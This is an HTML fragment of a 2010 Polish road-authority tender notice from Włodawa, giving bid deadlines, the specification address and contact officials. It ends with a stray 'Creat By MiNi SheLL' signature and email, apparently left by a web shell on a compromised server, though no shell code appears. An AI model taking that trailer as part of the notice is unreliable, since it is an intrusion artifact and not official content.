<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie ul. Lubelska 60  w pokoju nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie ul. Lubelska 60  w pokoju nr 15 /sekretariat / 
Otwarcie ofert w dniu 23/04/2010 r. godz.09:10, pokój nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (82) 572-17-93 lub drogą elektroniczną na adres 
e-mail: rdw.wlodawa@zdw.lublin.pl
         Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron    
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
        Osoby uprawnione do porozumiewania się z Wykonawcami.
               1.   W sprawach technicznych - Krystyna Kowalewska   tel. (82) 572 19 52
            2. W sprawach   formalno-prawnych   związanych   z   postępowaniem 
             o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk, 
             Eugeniusz  Kiewczykowski  tel. (82) 572 16 35.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com